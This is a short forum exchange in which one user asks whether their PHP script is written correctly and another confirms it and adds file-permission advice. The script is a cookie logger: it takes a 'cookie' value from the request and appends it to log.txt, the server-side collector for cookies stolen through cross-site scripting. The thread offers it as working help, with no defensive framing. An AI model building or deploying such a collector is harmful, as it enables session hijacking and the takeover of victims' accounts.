Quote Originally Posted by dipman44 View Post
would this be how i would write the php?:
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
Yes, but you would have to set the permissions on htdocs and log.txt to 755.